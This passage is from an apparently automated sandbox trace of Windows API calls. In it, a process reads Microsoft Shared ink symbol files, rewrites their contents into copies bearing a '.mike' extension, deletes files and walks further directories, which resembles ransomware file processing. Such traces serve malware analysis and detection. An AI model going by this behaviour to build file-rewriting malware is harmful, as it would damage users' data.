shared\\ink\\fsdefinitions\\symbols\\symbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.287] GetFileType (hFile=0x264) returned 0x1 [0046.287] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefc0) returned 1 [0046.287] GetFileType (hFile=0x264) returned 0x1 [0046.287] CloseHandle (hObject=0x264) returned 1 [0046.287] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", lpFilePart=0x0) returned 0x54 [0046.287] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", lpFilePart=0x0) returned 0x54 [0046.287] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aebcc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0046.287] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af120) returned 1 [0046.287] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0046.287] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0046.287] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0046.287] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml"), fInfoLevelId=0x0, lpFileInformation=0x22d587c | out: lpFileInformation=0x22d587c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9003b703, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x9003b703, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x90061861, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xacc)) returned 1 [0046.287] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0046.287] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", lpFilePart=0x0) returned 0x54 [0046.287] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0046.288] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml"), fInfoLevelId=0x0, lpFileInformation=0x22d5bcc | out: lpFileInformation=0x22d5bcc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9003b703, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x9003b703, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x90061861, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xacc)) returned 1 [0046.288] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0046.288] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", lpFilePart=0x0) returned 0x54 [0046.288] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml.mike", lpFilePart=0x0) returned 0x59 [0046.288] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0046.288] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0046.288] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0046.288] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", lpFilePart=0x0) returned 0x54 [0046.288] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", lpFilePart=0x0) returned 0x54 [0046.288] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", lpFilePart=0x0) returned 0x54 [0046.288] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml.mike", lpFilePart=0x0) returned 0x59 [0046.288] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0046.288] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af08c | out: lpFileInformation=0x2af08c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0046.289] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0046.289] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml.mike", lpFilePart=0x0) returned 0x59 [0046.289] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0046.289] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.289] GetFileType (hFile=0x264) returned 0x1 [0046.289] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0046.289] GetFileType (hFile=0x264) returned 0x1 [0046.289] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x0 [0046.289] WriteFile (in: hFile=0x264, lpBuffer=0x22d6bac*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x22d6bac*, lpNumberOfBytesWritten=0x2af02c*=0x220, lpOverlapped=0x0) returned 1 [0046.290] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0046.290] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml"), fInfoLevelId=0x0, lpFileInformation=0x22d6664 | out: lpFileInformation=0x22d6664*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9003b703, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x9003b703, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x90061861, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xacc)) returned 1 [0046.290] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0046.290] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", lpFilePart=0x0) returned 0x54 [0046.290] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0046.290] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.291] GetFileType (hFile=0x264) returned 0x1 [0046.291] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0046.291] GetFileType (hFile=0x264) returned 0x1 [0046.291] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af02c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af02c*=0) returned 0x0 [0046.291] ReadFile (in: hFile=0x264, lpBuffer=0x22d7cf0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x22d7cf0*, lpNumberOfBytesRead=0x2af038*=0xacc, lpOverlapped=0x0) returned 1 [0046.292] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml.mike", lpFilePart=0x0) returned 0x59 [0046.292] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0046.293] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.293] GetFileType (hFile=0x264) returned 0x1 [0046.293] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0046.293] GetFileType (hFile=0x264) returned 0x1 [0046.293] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x220 [0046.293] WriteFile (in: hFile=0x264, lpBuffer=0x22dec78*, nNumberOfBytesToWrite=0xad0, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x22dec78*, lpNumberOfBytesWritten=0x2af02c*=0xad0, lpOverlapped=0x0) returned 1 [0046.293] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeac0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml.mike", lpFilePart=0x0) returned 0x59 [0046.293] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefb4) returned 1 [0046.293] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.293] GetFileType (hFile=0x264) returned 0x1 [0046.293] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefb0) returned 1 [0046.293] GetFileType (hFile=0x264) returned 0x1 [0046.294] WriteFile (in: hFile=0x264, lpBuffer=0x22e1ebc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x22e1ebc*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0046.295] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", lpFilePart=0x0) returned 0x54 [0046.295] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml.mike", lpFilePart=0x0) returned 0x59 [0046.295] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0046.295] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5cc2fa0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5cc2fa0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5cc2fa0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xcf0)) returned 1 [0046.295] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0046.295] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", lpFilePart=0x0) returned 0x54 [0046.295] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml.mike", lpFilePart=0x0) returned 0x59 [0046.295] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0046.295] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x22e3708 | out: lpFileInformation=0x22e3708*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5cc2fa0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5cc2fa0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5cc2fa0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xcf0)) returned 1 [0046.295] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0046.295] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", lpFilePart=0x0) returned 0x54 [0046.295] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", dwFileAttributes=0x80) returned 0 [0046.296] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", lpFilePart=0x0) returned 0x54 [0046.296] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml.mike", lpFilePart=0x0) returned 0x59 [0046.296] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe0) returned 1 [0046.296] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af05c | out: lpFileInformation=0x2af05c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5cc2fa0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5cc2fa0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5cc2fa0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xcf0)) returned 1 [0046.297] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefdc) returned 1 [0046.297] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", lpFilePart=0x0) returned 0x54 [0046.297] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml.mike", lpFilePart=0x0) returned 0x59 [0046.297] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml.mike")) returned 1 [0046.299] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0046.299] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols", lpFilePart=0x0) returned 0x48 [0046.299] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\", nBufferLength=0x105, lpBuffer=0x2aec38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\", lpFilePart=0x0) returned 0x49 [0046.299] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe5cc2fa0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5cc2fa0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.299] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe5cc2fa0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5cc2fa0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.299] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1dc0758, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1dc0758, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x900155a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="ea-sym.xml", cAlternateFileName="")) returned 1 [0046.299] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d9a5fb, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d9a5fb, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x900155a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-jp-sym.xml", cAlternateFileName="")) returned 1 [0046.299] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9003b703, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x9003b703, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x90061861, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xacc, dwReserved0=0x0, dwReserved1=0x0, cFileName="symbase.xml", cAlternateFileName="")) returned 1 [0046.300] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9003b703, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x9003b703, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x90061861, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xacc, dwReserved0=0x0, dwReserved1=0x0, cFileName="symbase.xml", cAlternateFileName="")) returned 0 [0046.300] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.300] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0046.300] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0046.300] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\.", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web", lpFilePart=0x0) returned 0x44 [0046.300] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0046.300] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.300] CoTaskMemFree (pv=0x4fe370) [0046.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0046.300] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web", lpFilePart=0x0) returned 0x44 [0046.300] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0046.300] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web", lpFilePart=0x0) returned 0x44 [0046.300] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\", nBufferLength=0x105, lpBuffer=0x2aec38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\", lpFilePart=0x0) returned 0x45 [0046.300] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, 